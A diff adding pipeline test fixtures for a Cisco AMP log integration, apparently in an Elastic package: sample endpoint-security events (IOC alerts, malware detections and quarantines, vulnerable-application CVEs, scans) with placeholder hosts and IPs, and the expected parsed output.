+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1515298355162029000,"timestamp":1610532788,"timestamp_nanoseconds":162019000,"date":"2021-01-13T10:13:08+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1610532788,"start_date":"2021-01-13T10:13:08+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.","short_description":"W32.WinWord.Powershell"},"file":{"disposition":"Clean","file_name":"PowerShell.exe","file_path":"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/PowerShell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"3d46e95284f93bbb76b3b7e1bf0e1b2d51e8a9411c2b6e649112f22f92de63c2"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6508153524038140000,"timestamp":1610532007,"timestamp_nanoseconds":606000000,"date":"2021-01-13T10:00:07+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6508153524038139905","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"4a45dbc60436fc72fbd8a8bf81995c378575142e0022015f29a4b25546e19cef"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1521062325693667300,"timestamp":1610447087,"timestamp_nanoseconds":693632000,"date":"2021-01-12T10:24:47+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610447087,"start_date":"2021-01-12T10:24:47+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention_Audit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d2:78:15:4a:f4:a2"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.","short_description":"W32.PowershellDownloadedExecutable.ioc"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/System32/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6532910514396201000,"timestamp":1610446522,"timestamp_nanoseconds":872000000,"date":"2021-01-12T10:15:22+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Exploit_Prevention_Audit","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"d2:78:15:4a:f4:a2"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525520937264087000,"timestamp":1608875349,"timestamp_nanoseconds":661000000,"date":"2020-12-25T05:49:09+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.GenericKD:Malwaregen.21do.1201","detection_id":"6525520937264087041","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"OLD.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Desktop\\OLD.exe","identity":{"sha256":"edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9","sha1":"26de43cc558a4e0e60eddd4dc9321bcb5a0a181c","md5":"cfdd16225e67471f5ef54cab9b3a5558"},"parent":{"process_id":2632,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"d5bc504277172be5c54b60ad5c13209dc1f729131def084de3ec8c72e54c58ef","sha1":"84123a3decdaa217e3588a1de59fe6cee1998004","md5":"38ae1b3c38faef56fe4907922f0385ba"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525520937264087000,"timestamp":1608875349,"timestamp_nanoseconds":661000000,"date":"2020-12-25T05:49:09+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6525520937264087041","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525516191325225000,"timestamp":1608874244,"timestamp_nanoseconds":500000000,"date":"2020-12-25T05:30:44+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"Auto.F2863A.211556.in02","detection_id":"6525516191325224961","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"twhy.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Roaming\\twhy.exe","identity":{"sha256":"f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117","sha1":"7d9518ea3f98d037745352b23861fab05d3777dc","md5":"c624d61b8f076c3ef05f74eeb96c8954"},"parent":{"process_id":4868,"disposition":"Clean","file_name":"powershell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7","sha1":"04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d","md5":"92f44e405db16ac55d97e3bfe3b132fa"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525516191325225000,"timestamp":1608874244,"timestamp_nanoseconds":500000000,"date":"2020-12-25T05:30:44+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6525516191325224961","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1519340132516139000,"timestamp":1608874241,"timestamp_nanoseconds":516130000,"date":"2020-12-25T05:30:41+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1608874241,"start_date":"2020-12-25T05:30:41+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.","short_description":"W32.PowershellDownloadedExecutable.ioc"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"664e83900e42179cfea99edb71abaf00b35e558da8d5f2e35004b2a623d5b5f7"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":1519340132474871000,"timestamp":1608874241,"timestamp_nanoseconds":474861000,"date":"2020-12-25T05:30:41+00:00","event_type":"Cloud IOC","event_type_id":1107296274,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","start_timestamp":1608874241,"start_date":"2020-12-25T05:30:41+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"cloud_ioc":{"description":"Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.","short_description":"W32.WinWord.Powershell"},"file":{"disposition":"Clean","file_name":"powershell.exe","file_path":"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe","identity":{"sha256":"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7"},"parent":{"disposition":"Clean","identity":{"sha256":"664e83900e42179cfea99edb71abaf00b35e558da8d5f2e35004b2a623d5b5f7"}}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":15193384389977,"timestamp":1608872547,"timestamp_nanoseconds":0,"date":"2020-12-25T05:02:27+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1608872547,"start_date":"2020-12-25T05:02:27+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"mshtml.dll","identity":{"sha256":"d1bea74ac9d85b3dcd4abc1af42af6c37b9349defc8e6577993611b773f56ca0"},"parent":{"disposition":"Clean","identity":{"sha256":"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8"}}},"vulnerabilities":[{"name":"Microsoft Internet Explorer","version":"11","cve":"CVE-2018-0762","score":"7.6","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0762"},{"cve":"CVE-2018-0772","score":"7.6","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0772"}]}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":15193384371995,"timestamp":1608872546,"timestamp_nanoseconds":0,"date":"2020-12-25T05:02:26+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1608872546,"start_date":"2020-12-25T05:02:26+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"mshtml.dll","identity":{"sha256":"1dc5d15a26a79bb46519952a60b15aa4acb36f6ce3247ebf50df9c157bc4fcf4"},"parent":{"disposition":"Clean","identity":{"sha256":"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8"}}},"vulnerabilities":[{"name":"Microsoft Internet Explorer","version":"11","cve":"CVE-2018-0762","score":"7.6","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0762"},{"cve":"CVE-2018-0772","score":"7.6","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0772"}]}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":15193366641599,"timestamp":1608870773,"timestamp_nanoseconds":0,"date":"2020-12-25T04:32:53+00:00","event_type":"Vulnerable Application Detected","event_type_id":1107296279,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Low","start_timestamp":1608870773,"start_date":"2020-12-25T04:32:53+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Clean","file_name":"OUTLOOK.EXE","identity":{"sha256":"465f398ae8e3c32395eb7c04bc8cd24595068e6a127e243bed3e9b4931556bfc"},"parent":{"disposition":"Clean","identity":{"sha256":"71854d2c40664493e05c0a7e4f0c7cc74ada1a63eec1d4fe32350f6af8728243"}}},"vulnerabilities":[{"name":"Microsoft Office","version":"2016","cve":"CVE-2017-0106","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0106"},{"cve":"CVE-2017-11774","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11774"},{"cve":"CVE-2017-8506","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8506"},{"cve":"CVE-2017-8507","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8507"},{"cve":"CVE-2017-8571","score":"6.8","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8571"},{"cve":"CVE-2017-8663","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8663"},{"cve":"CVE-2018-0791","score":"9.3","url":"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0791"}]}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525498672153625000,"timestamp":1608870165,"timestamp_nanoseconds":878000000,"date":"2020-12-25T04:22:45+00:00","event_type":"Policy Update","event_type_id":553648130,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525494703603843000,"timestamp":1608869241,"timestamp_nanoseconds":928000000,"date":"2020-12-25T04:07:21+00:00","event_type":"Scan Completed, No Detections","event_type_id":554696715,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan","clean":true,"scanned_files":2872,"scanned_processes":49,"scanned_paths":0,"malicious_detections":0}}}
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6525494527510184000,"timestamp":1608869200,"timestamp_nanoseconds":537000000,"date":"2020-12-25T04:06:40+00:00","event_type":"Scan Started","event_type_id":554696714,"connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Intel","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"e6:44:a0:56:f3:9a"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"scan":{"description":"Flash Scan"}}}
diff --git a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco_amp1.ndjson.log-expected.json b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco_amp1.ndjson.log-expected.json
new file mode 100644
index 00000000000..3ef7fced190
--- /dev/null
+++ b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco_amp1.ndjson.log-expected.json
@@ -0,0 +1,4041 @@
+{
+    "expected": [
+        {
+            "@timestamp": "2021-01-14T10:33:46.000Z",
+            "file": {
+                "name": "MspthrdHash.exe",
+                "path": "\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\MspthrdHash\\MspthrdHash.exe",
+                "hash": {
+                    "sha1": "128aa78059540cf0cdae2a3cea30cd80e00f2046",
+                    "sha256": "12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837",
+                    "md5": "c877b67a5733c59d0d8ed8d519df0c91"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_Qakbot_1"
+                ],
+                "hash": [
+                    "12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837",
+                    "c877b67a5733c59d0d8ed8d519df0c91",
+                    "128aa78059540cf0cdae2a3cea30cd80e00f2046"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "name": "Demo_Qakbot_1",
+                "hostname": "Demo_Qakbot_1"
+            },
+            "event": {
+                "severity": 3,
+                "ingested": "2021-09-12T17:32:35.701333474Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411425813945647000,\"timestamp\":1610620426,\"timestamp_nanoseconds\":742000000,\"date\":\"2021-01-14T10:33:46+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.12081E6CA3-95.SBX.TG\",\"detection_id\":\"6411425813945647105\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"MspthrdHash.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\MspthrdHash\\\\MspthrdHash.exe\",\"identity\":{\"sha256\":\"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837\",\"sha1\":\"128aa78059540cf0cdae2a3cea30cd80e00f2046\",\"md5\":\"c877b67a5733c59d0d8ed8d519df0c91\"}}}}",
+                "kind": "alert",
+                "action": "Retrospective Detection",
+                "id": "6411425813945647000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.12081E6CA3-95.SBX.TG",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "f9:65:da:22:2a:41",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "f9:65:da:22:2a:41"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6411425813945647105",
+                    "event_type_id": 553648147
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T10:15:29.000Z",
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_AMP_Threat_Quarantined"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_AMP_Threat_Quarantined",
+                "hostname": "Demo_AMP_Threat_Quarantined"
+            },
+            "event": {
+                "severity": 0,
+                "action": "Policy Update",
+                "ingested": "2021-09-12T17:32:35.701337792Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6533243623469744000,\"timestamp\":1610619329,\"timestamp_nanoseconds\":596000000,\"date\":\"2021-01-14T10:15:29+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Quarantined\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"24:78:d8:fd:c4:75\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}",
+                "id": "6533243623469744000",
+                "kind": "alert"
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "24:78:d8:fd:c4:75",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "24:78:d8:fd:c4:75"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "event_type_id": 553648130
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "process": {
+                "name": "svchost.exe",
+                "pid": 896,
+                "hash": {
+                    "sha1": "4af001b3c3816b860660cf2de2c0fd3c1dfb4878",
+                    "sha256": "121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2",
+                    "md5": "54a47f6b5e09a77e61649109c6a08866"
+                }
+            },
+            "@timestamp": "2021-01-14T10:06:39.000Z",
+            "file": {
+                "name": "BIT657.tmp",
+                "path": "\\\\?\\C:\\BIT657.tmp",
+                "hash": {
+                    "sha1": "cf162622e29bca072d01b274fbbc3ceaacdd13c7",
+                    "sha256": "a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850",
+                    "md5": "0fe5be3811a98ee6a9c997d3812d911a"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "user": [
+                    "user@testdomain.com"
+                ],
+                "hosts": [
+                    "Demo_AMP_Threat_Quarantined"
+                ],
